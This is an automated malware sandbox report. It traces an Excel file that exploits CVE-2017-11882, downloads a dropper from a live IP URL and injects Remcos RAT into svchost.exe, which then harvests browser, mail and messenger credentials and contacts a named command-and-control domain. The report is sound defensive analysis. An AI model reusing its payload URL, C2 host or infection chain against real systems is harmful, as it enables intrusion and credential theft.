          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,17_2_00452036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_004520C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,17_2_00452313
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,17_2_00448404
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_0045243C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,17_2_00452543
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00452610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,17_2_0040F8D1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,17_2_004488ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: IsValidCodePage,GetLocaleInfoW,17_2_00451CD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,17_2_00451F50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,17_2_00451F9B
          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0024333F GetSystemTimeAsFileTime,3_2_0024333F
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0026D27A GetUserNameW,3_2_0026D27A
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010BB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,16_2_010BB952
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_002142DE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data17_2_0040BA12
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\17_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: \key3.db17_2_0040BB30
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqliteJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3752, type: MEMORYSTR
          Source: Bactris.exeBinary or memory string: WIN_81
          Source: Bactris.exeBinary or memory string: WIN_XP
          Source: Bactris.exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: Bactris.exeBinary or memory string: WIN_XPe
          Source: Bactris.exeBinary or memory string: WIN_VISTA
          Source: Bactris.exeBinary or memory string: WIN_7
          Source: Bactris.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Source: C:\Windows\SysWOW64\svchost.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-E70NOSJump to behavior
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\svchost.exeCode function: cmd.exe17_2_0040569A
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00291204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,3_2_00291204
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00291806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_00291806
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_01101204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,16_2_01101204
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_01101806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_01101806
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information2
          Scripting
          2
          Valid Accounts
          1
          Native API
          2
          Scripting
          1
          Exploitation for Privilege Escalation
          1
          Disable or Modify Tools
          2
          OS Credential Dumping
          2
          System Time Discovery
          Remote Services11
          Archive Collected Data
          25
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts3
          Exploitation for Client Execution
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          221
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol1
          Data from Local System
          21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Command and Scripting Interpreter
          2
          Valid Accounts
          1
          Bypass User Account Control
          2
          Obfuscated Files or Information
          1
          Credentials in Registry
          1
          System Service Discovery
          SMB/Windows Admin Shares2
          Email Collection
          1
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          Service Execution
          1
          Windows Service
          2
          Valid Accounts
          1
          DLL Side-Loading
          3
          Credentials In Files
          4
          File and Directory Discovery
          Distributed Component Object Model221
          Input Capture
          1
          Remote Access Software
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchd2
          Registry Run Keys / Startup Folder
          21
          Access Token Manipulation
          1
          Bypass User Account Control
          LSA Secrets38
          System Information Discovery
          SSH3
          Clipboard Data
          3
          Non-Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
          Windows Service
          3
          Masquerading
          Cached Domain Credentials12
          Security Software Discovery
          VNCGUI Input Capture114
          Application Layer Protocol
          Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items422
          Process Injection
          2
          Valid Accounts
          DCSync11
          Virtualization/Sandbox Evasion
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
          Registry Run Keys / Startup Folder
          11
          Virtualization/Sandbox Evasion
          Proc Filesystem4
          Process Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
          Access Token Manipulation
          /etc/passwd and /etc/shadow1
          Application Window Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron422
          Process Injection
          Network Sniffing1
          System Owner/User Discovery
          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
          Remote System Discovery
          Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1435094 Sample: 202404294766578200.xlam.xlsx Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Antivirus detection for URL or domain 2->71 73 18 other signatures 2->73 10 EXCEL.EXE 6 11 2->10         started        12 chrome.exe 4 2->12         started        15 chrome.exe 2->15         started        process3 dnsIp4 17 EQNEDT32.EXE 1 10->17         started        63 192.168.2.22, 137, 138, 2766 unknown unknown 12->63 65 239.255.255.250 unknown Reserved 12->65 22 chrome.exe 12->22         started        24 chrome.exe 15->24         started        process5 dnsIp6 51 23.94.54.101, 49161, 80 AS-COLOCROSSINGUS United States 17->51 45 C:\Users\user\AppData\Roaming\YED.exe, PE32 17->45 dropped 75 Office equation editor establishes network connection 17->75 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 17->77 26 YED.exe 6 17->26         started        53 www.google.com 172.217.1.4, 443, 49162, 49163 GOOGLEUS United States 22->53 55 127.0.0.1 unknown unknown 22->55 file7 signatures8 process9 file10 47 C:\Users\user\AppData\Local\...\Bactris.exe, PE32 26->47 dropped 95 Binary is likely a compiled AutoIt script file 26->95 97 Machine Learning detection for dropped file 26->97 99 Found API chain indicative of sandbox detection 26->99 30 Bactris.exe 3 26->30         started        signatures11 process12 file13 49 C:\Users\user\AppData\Roaming\...\Bactris.vbs, data 30->49 dropped 101 Binary is likely a compiled AutoIt script file 30->101 103 Machine Learning detection for dropped file 30->103 105 Drops VBS files to the startup folder 30->105 107 3 other signatures 30->107 34 svchost.exe 3 11 30->34         started        signatures14 process15 dnsIp16 57 yuahdgbceja.sytes.net 34->57 59 geoplugin.net 34->59 61 2 other IPs or domains 34->61 79 System process connects to network (likely due to code injection or exploit) 34->79 81 Contains functionality to bypass UAC (CMSTPLUA) 34->81 83 Detected Remcos RAT 34->83 85 7 other signatures 34->85 38 svchost.exe 1 34->38         started        41 svchost.exe 1 34->41         started        43 svchost.exe 13 34->43         started        signatures17 process18 signatures19 87 Tries to steal Instant Messenger accounts or passwords 38->87 89 Tries to steal Mail credentials (via file / registry access) 38->89 91 Searches for Windows Mail specific files 38->91 93 Tries to harvest and steal browser information (history, passwords, etc) 41->93

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          202404294766578200.xlam.xlsx68%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
          202404294766578200.xlam.xlsx51%VirustotalBrowse
          202404294766578200.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\YED.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe100%Joe Sandbox ML
          No Antivirus matches
          SourceDetectionScannerLabelLink
          yuahdgbceja.sytes.net1%VirustotalBrowse
          geoplugin.net4%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.imvu.comr0%URL Reputationsafe
          https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
          http://geoplugin.net/json.gp/C100%URL Reputationphishing
          http://geoplugin.net/json.gp100%URL Reputationphishing
          http://www.ebuddy.com0%URL Reputationsafe
          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
          http://b.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
          http://23.94.54.101/GVV.exe100%Avira URL Cloudmalware
          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
          http://cache.btrll.com/default/Pix-1x1.gif0%Avira URL Cloudsafe
          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%VirustotalBrowse
          yuahdgbceja.sytes.net0%Avira URL Cloudsafe
          http://cache.btrll.com/default/Pix-1x1.gif0%VirustotalBrowse
          http://b.scorecardresearch.com/beacon.js0%VirustotalBrowse
          yuahdgbceja.sytes.net1%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          yuahdgbceja.sytes.net
          23.94.53.100
          truetrueunknown
          geoplugin.net
          178.237.33.50
          truetrueunknown
          www.google.com
          172.217.1.4
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMuBzLEGIjDHkOYETEkfpPO5BNVM4qFB3EzErW1N_BxHwWaZNSSd6fpa03DeWClTlQmn-8-Tj7IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
              high
              http://23.94.54.101/GVV.exetrue
              • Avira URL Cloud: malware
              unknown
              https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMqBzLEGIjAmi-UIIFqSTjkw-RfWXi2GfkOK6xdeNQDHNk-OB5e4eww8XVW3FAYyUUV3pTR2uxYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                high
                https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                  high
                  https://www.google.com/chrome/whats-new/m109?internal=truefalse
                    high
                    https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGMmBzLEGIjB5NrDOyf958iCbJpAJxeAyyHGDgUuUJYBV60K9olc20v99BBChXQUVByr6JLh_QvcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                      high
                      https://www.google.com/async/newtab_promosfalse
                        high
                        http://geoplugin.net/json.gptrue
                        • URL Reputation: phishing
                        unknown
                        https://www.google.com/async/ddljson?async=ntp:2false
                          high
                          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                            high
                            yuahdgbceja.sytes.nettrue
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://b.scorecardresearch.com/beacon.jsbhvA8BE.tmp.20.drfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/chrome_newtabsvchost.exe, 00000014.00000002.778860586.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, chp8DDF.tmp.20.drfalse
                              high
                              http://acdn.adnxs.com/ast/ast.jsbhvA8BE.tmp.20.drfalse
                                high
                                http://www.imvu.comrsvchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://duckduckgo.com/ac/?q=chp8DDF.tmp.20.drfalse
                                  high
                                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvA8BE.tmp.20.drfalse
                                    high
                                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvA8BE.tmp.20.drfalse
                                      high
                                      http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvA8BE.tmp.20.drfalse
                                        high
                                        https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvA8BE.tmp.20.drfalse
                                          high
                                          http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvA8BE.tmp.20.drfalse
                                            high
                                            http://www.nirsoft.netsvchost.exe, 00000014.00000002.778795762.00000000001E3000.00000004.00000010.00020000.00000000.sdmpfalse
                                              high
                                              https://deff.nelreports.net/api/report?cat=msnbhvA8BE.tmp.20.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvA8BE.tmp.20.drfalse
                                                high
                                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comsvchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://cache.btrll.com/default/Pix-1x1.gifbhvA8BE.tmp.20.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvA8BE.tmp.20.drfalse
                                                  high
                                                  https://www.google.comsvchost.exe, 00000011.00000002.783747275.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000016.00000002.769616535.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    high
                                                    http://geoplugin.net/json.gp/CBactris.exe, 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmptrue
                                                    • URL Reputation: phishing
                                                    unknown
